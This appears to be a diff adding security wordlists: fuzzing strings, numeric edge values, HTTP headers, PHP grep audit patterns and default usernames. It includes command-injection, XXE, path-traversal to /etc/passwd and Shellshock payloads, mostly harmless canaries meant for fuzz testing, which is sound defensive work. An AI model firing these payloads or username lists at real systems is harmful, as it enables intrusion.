/dev/null; touch /tmp/blns.fail ; echo
|
||||
`touch /tmp/blns.fail`
|
||||
$(touch /tmp/blns.fail)
|
||||
@{[system "touch /tmp/blns.fail"]}
|
||||
|
||||
# Command Injection (Ruby)
|
||||
#
|
||||
# Strings which can call system commands within Ruby/Rails applications
|
||||
|
||||
eval("puts 'hello world'")
|
||||
System("ls -al /")
|
||||
`ls -al /`
|
||||
Kernel.exec("ls -al /")
|
||||
Kernel.exit(1)
|
||||
%x('ls -al /')
|
||||
|
||||
# XXE Injection (XML)
|
||||
#
|
||||
# String which can reveal system files when parsed by a badly configured XML parser
|
||||
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
|
||||
|
||||
# Unwanted Interpolation
|
||||
#
|
||||
# Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.
|
||||
|
||||
$HOME
|
||||
$ENV{'HOME'}
|
||||
%d
|
||||
%s%s%s%s%s
|
||||
{0}
|
||||
%*.*s
|
||||
%@
|
||||
%n
|
||||
File:///
|
||||
|
||||
# File Inclusion
|
||||
#
|
||||
# Strings which can cause user to pull in files that should not be a part of a web server
|
||||
|
||||
../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../etc/hosts
|
||||
|
||||
# Known CVEs and Vulnerabilities
|
||||
#
|
||||
# Strings that test for known vulnerabilities
|
||||
|
||||
() { 0; }; touch /tmp/blns.shellshock1.fail;
|
||||
() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }
|
||||
<<< %s(un='%s') = %u
|
||||
+++ATH0
|
||||
|
||||
# MSDOS/Windows Special Filenames
|
||||
#
|
||||
# Strings which are reserved characters in MSDOS/Windows
|
||||
|
||||
CON
|
||||
PRN
|
||||
AUX
|
||||
CLOCK$
|
||||
NUL
|
||||
A:
|
||||
ZZ:
|
||||
COM1
|
||||
LPT1
|
||||
LPT2
|
||||
LPT3
|
||||
COM2
|
||||
COM3
|
||||
COM4
|
||||
|
||||
# IRC specific strings
|
||||
#
|
||||
# Strings that may occur on IRC clients that make security products freak out
|
||||
|
||||
DCC SEND STARTKEYLOGGER 0 0 0
|
||||
|
||||
# Scunthorpe Problem
|
||||
#
|
||||
# Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)
|
||||
|
||||
Scunthorpe General Hospital
|
||||
Penistone Community Church
|
||||
Lightwater Country Park
|
||||
Jimmy Clitheroe
|
||||
Horniman Museum
|
||||
shitake mushrooms
|
||||
RomansInSussex.co.uk
|
||||
http://www.cum.qc.ca/
|
||||
Craig Cockburn, Software Specialist
|
||||
Linda Callahan
|
||||
Dr. Herman I. Libshitz
|
||||
magna cum laude
|
||||
Super Bowl XXX
|
||||
medieval erection of parapets
|
||||
evaluate
|
||||
mocha
|
||||
expression
|
||||
Arsenal canal
|
||||
classic
|
||||
Tyson Gay
|
||||
Dick Van Dyke
|
||||
basement
|
||||
|
||||
# Human injection
|
||||
#
|
||||
# Strings which may cause human to reinterpret worldview
|
||||
|
||||
If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.
|
||||
|
||||
# Terminal escape codes
|
||||
#
|
||||
# Strings which punish the fools who use cat/type on this file
|
||||
|
||||
Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue
|
||||
But now...[20Cfor my greatest trick...[8m
|
||||
The quick brown fox... [Beeeep]
|
||||
|
||||
# iOS Vulnerabilities
|
||||
#
|
||||
# Strings which crashed iMessage in various versions of iOS
|
||||
|
||||
Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗
|
||||
🏳0🌈️
|
||||
జ్ఞా
|
44
Fuzzing/numeric-fields-only.txt
Normal file
44
Fuzzing/numeric-fields-only.txt
Normal file
@ -0,0 +1,44 @@
|
||||
16649142472222295162770764775
|
||||
2.07564741538e+16
|
||||
3.38800266804e+16
|
||||
-139333426276771806651771
|
||||
-1.97684995314e+16
|
||||
0x481b49d0f8d5a3e7f821066157c37c
|
||||
9223372036854775807
|
||||
9223372036854775808
|
||||
-9223372036854775809
|
||||
1.79769313486e+308
|
||||
1.79769313486e+308
|
||||
2139095040
|
||||
2.22507385851e-308
|
||||
79228162514264337593543950336L
|
||||
79228162514264337593543950336l
|
||||
79228162514264337593543950336B
|
||||
inf
|
||||
Infinity
|
||||
-Infinity
|
||||
NaN
|
||||
255
|
||||
65535
|
||||
4294967295
|
||||
18446744073709551615
|
||||
256
|
||||
65536
|
||||
4294967296
|
||||
18446744073709551616
|
||||
127
|
||||
32767
|
||||
2147483647
|
||||
9223372036854775807
|
||||
128
|
||||
32768
|
||||
2147483648
|
||||
9223372036854775808
|
||||
-128
|
||||
-32768
|
||||
-2147483648
|
||||
-9223372036854775808
|
||||
-129
|
||||
-32769
|
||||
-2147483649
|
||||
-9223372036854775809
|
@ -0,0 +1,21 @@
|
||||
DNT: 1
|
||||
Front-End-Https: on
|
||||
Proxy-Connection: keep-alive
|
||||
X-Att-Deviceid: GT-P7320/P7320XXLPG
|
||||
X-CSRFToken: DECAFC0FFEEBAD
|
||||
X-Correlation-ID: f058ebd6-02f7-4d3f-942e-904344e8cde5
|
||||
X-Csrf-Token: DECAFC0FFEEBAD
|
||||
X-XSRF-TOKEN: DECAFC0FFEEBAD
|
||||
X-Do-Not-Track: 1
|
||||
X-Forwarded-For: 127.0.0.1
|
||||
X-Forwarded-For: client1, proxy1, proxy2
|
||||
X-Forwarded-Host: localhost
|
||||
X-Forwarded-Host: localhost:8080
|
||||
X-Forwarded-Proto: https
|
||||
X-HTTP-Method-Override: PUT
|
||||
X-ProxyUser-Ip: 127.0.0.1
|
||||
X-Request-ID: f058ebd6-02f7-4d3f-942e-904344e8cde5
|
||||
X-Requested-With: XMLHttpRequest
|
||||
X-UIDH: 31337DEADBEEFCAFE
|
||||
X-Wap-Profile: http://wap.samsungmobile.com/uaprof/SGH-I777.xml
|
||||
X-XSRF-TOKEN: DECAFC0FFEEBAD
|
@ -0,0 +1,19 @@
|
||||
DNT
|
||||
Front-End-Https
|
||||
Proxy-Connection
|
||||
X-ATT-DeviceId
|
||||
X-CSRFToken
|
||||
X-Correlation-ID
|
||||
X-Csrf-Token
|
||||
X-XSRF-TOKEN
|
||||
X-Do-Not-Track
|
||||
X-Forwarded-For
|
||||
X-Forwarded-Host
|
||||
X-Forwarded-Proto
|
||||
X-Http-Method-Override
|
||||
X-ProxyUser-Ip
|
||||
X-Request-ID
|
||||
X-Requested-With
|
||||
X-UIDH
|
||||
X-Wap-Profile
|
||||
X-XSRF-TOKEN
|
@ -0,0 +1,45 @@
|
||||
Accept-Charset: utf-8
|
||||
Accept-Datetime: Thu, 31 May 2007 20:35:00 GMT
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US
|
||||
Accept: text/plain
|
||||
Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==
|
||||
Cache-Control: no-cache
|
||||
Connection: Upgrade
|
||||
Connection: keep-alive
|
||||
Content-Length: 348
|
||||
Content-MD5: Q2hlY2sgSW50ZWdyaXR5IQ==
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: $Version=1; Skin=new;
|
||||
Date: Tue, 15 Nov 1994 08:12:31 GMT
|
||||
Expect: 100-continue
|
||||
Forwarded: for=192.0.2.43, for=198.51.100.17
|
||||
Forwarded: for=192.0.2.60;proto=http;by=203.0.113.43
|
||||
From: user@example.com
|
||||
Host: localhost
|
||||
Host: localhost:8080
|
||||
If-Match: "737060cd8c284d8af7ad3082f209582d"
|
||||
If-Match: W/"weakmatch"
|
||||
If-Match: "im", "not", "dead", "yet"
|
||||
If-Match: *
|
||||
If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT
|
||||
If-None-Match: "737060cd8c284d8af7ad3082f209582d"
|
||||
If-None-Match: W/"weakmatch"
|
||||
If-None-Match: *
|
||||
If-Range: "737060cd8c284d8af7ad3082f209582d"
|
||||
If-Unmodified-Since: Sat, 29 Oct 1994 19:43:31 GMT
|
||||
Max-Forwards: 10
|
||||
Origin: http://localhost
|
||||
Pragma: no-cache
|
||||
Proxy-Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==
|
||||
Range: bytes=500-999
|
||||
Referer: http://localhost/
|
||||
TE: trailers, deflate
|
||||
Upgrade: HTTP/2.0
|
||||
Upgrade: HTTPS/1.3
|
||||
Upgrade: IRC/6.9
|
||||
Upgrade: RTA/x11
|
||||
Upgrade: websocket
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/21.0
|
||||
Via: 1.0 fred, 1.1 example.com (Apache/1.1)
|
||||
Warning: 199 Miscellaneous warning
|
@ -0,0 +1,33 @@
|
||||
Accept
|
||||
Accept-Charset
|
||||
Accept-Datetime
|
||||
Accept-Encoding
|
||||
Accept-Language
|
||||
Authorization
|
||||
Cache-Control
|
||||
Connection
|
||||
Content-Length
|
||||
Content-MD5
|
||||
Content-Type
|
||||
Cookie
|
||||
Date
|
||||
Expect
|
||||
Forwarded
|
||||
From
|
||||
Host
|
||||
If-Match
|
||||
If-Modified-Since
|
||||
If-None-Match
|
||||
If-Range
|
||||
If-Unmodified-Since
|
||||
Max-Forwards
|
||||
Origin
|
||||
Pragma
|
||||
Proxy-Authorization
|
||||
Range
|
||||
Referer
|
||||
TE
|
||||
Upgrade
|
||||
User-Agent
|
||||
Via
|
||||
Warning
|
@ -8,3 +8,4 @@ sessid
|
||||
sid
|
||||
viewstate
|
||||
zenid
|
||||
PHPSESSID
|
||||
|
46
Pattern-Matching/grepstrings-auditing-php.md
Normal file
46
Pattern-Matching/grepstrings-auditing-php.md
Normal file
@ -0,0 +1,46 @@
|
||||
# Auditing php source code with grep
|
||||
|
||||
## XSS
|
||||
`grep -Ri "echo" *`
|
||||
|
||||
`grep -Ri "\$_" * | grep "echo"`
|
||||
|
||||
`grep -Ri "\$_GET" * | grep "echo"`
|
||||
|
||||
`grep -Ri "\$_POST" * | grep "echo"`
|
||||
|
||||
`grep -Ri "\$_REQUEST" * | grep "echo"`
|
||||
|
||||
|
||||
- - -
|
||||
|
||||
|
||||
## SQL Injection
|
||||
`grep -Ri "$sql" *`
|
||||
|
||||
`grep -RI "mysqli(" *`
|
||||
|
||||
`grep -Ri "pdo(" * `
|
||||
|
||||
|
||||
- - -
|
||||
|
||||
|
||||
|
||||
## File inclusion
|
||||
`grep -Ri "file_include(" * `
|
||||
|
||||
`grep -Ri "file_get_contents(" * `
|
||||
|
||||
`grep -Ri "include(" *`
|
||||
|
||||
|
||||
- - -
|
||||
|
||||
|
||||
## Command execution
|
||||
`grep -Ri "shell_exec(" *`
|
||||
|
||||
`grep -RIt "system(" *`
|
||||
|
||||
`grep -Ri "exec(" * `
|
@ -92,3 +92,6 @@ str_repeat
|
||||
unserialize
|
||||
register_tick_function
|
||||
register_shutdown_function
|
||||
getuid
|
||||
uname
|
||||
gethostname
|
||||
|
@ -40,8 +40,12 @@ Significant effort is made to give attribution for these lists whenever possible
|
||||
- Great thanks to Michael Henriksen for allowing us to include his Gitrob project's signatures
|
||||
- Honored to have @Brutelogic's brilliant XSS Cheatsheet added to the Fuzzing section!
|
||||
- 0xsobky's Ultimate XSS Polyglot!
|
||||
- otih for bruteforce collected username and password lists
|
||||
- @otih for bruteforce collected username and password lists
|
||||
- @govolution for betterdefaultpasslist (https://github.com/govolution/betterdefaultpasslist)
|
||||
- Max Woolf (@minimaxir) for **big-list-of-naughty-strings** (https://github.com/minimaxir/big-list-of-naughty-strings) [`/Fuzzing/big-list-of-naughty-strings.txt`]
|
||||
- Ian Gallagher (@craSH) for **http-request-headers** [`/Miscellaneous/http-request-headers/`]
|
||||
- @badibouzouk for **Domino Hunter** (https://sourceforge.net/projects/dominohunter/) [`/Discovery/Web-Content/Domino-Hunter/`]
|
||||
- @coldfusion39 for **domi-owned** (https://github.com/coldfusion39/domi-owned) [`/Discovery/Web-Content/domino-*-coldfusion39.txt`]
|
||||
|
||||
This project stays great because of care and love from the community, and we will never forget that.
|
||||
|
||||
|
@ -9,3 +9,9 @@ user
|
||||
administrator
|
||||
oracle
|
||||
ftp
|
||||
pi
|
||||
puppet
|
||||
ansible
|
||||
ec2-user
|
||||
vagrant
|
||||
azureuser
|
||||
|
Loading…
x
Reference in New Issue
Block a user